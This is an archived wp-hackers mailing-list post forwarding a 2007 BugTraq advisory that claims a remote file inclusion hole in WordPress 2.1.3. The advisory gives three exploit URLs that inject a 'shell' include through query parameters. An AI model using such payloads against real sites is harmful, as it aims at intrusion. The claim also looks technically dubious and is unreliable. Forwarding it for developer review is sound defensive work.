[wp-hackers] FW: [BugTraq] WordPress v2.1.3 >> remote file include~
Ross M. W. Bennetts
ross.bennetts at une.edu.au
Thu Apr 26 01:37:06 GMT 2007
-----Original Message-----
From: s433d_only_linux at yahoo.de [mailto:s433d_only_linux at yahoo.de]
Sent: Wednesday, 25 April 2007 6:18 PM
To: bugtraq at securityfocus.com
Subject: WordPress v2.1.3 >> remote file include~
by : www.hackeraz.ir userz , saeid...
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk ..............: high #
Date .........: 25/4/2007 #
Found by ..........: s433d_only_linux #
Contact ...........: s433d_only_linux at yahoo.de #
Web .............: Www.hackerz.ir #
special thanx ........... Ali Jasbi my beste friend#
####################################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
####################################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
######################################################
More information about the wp-hackers
mailing list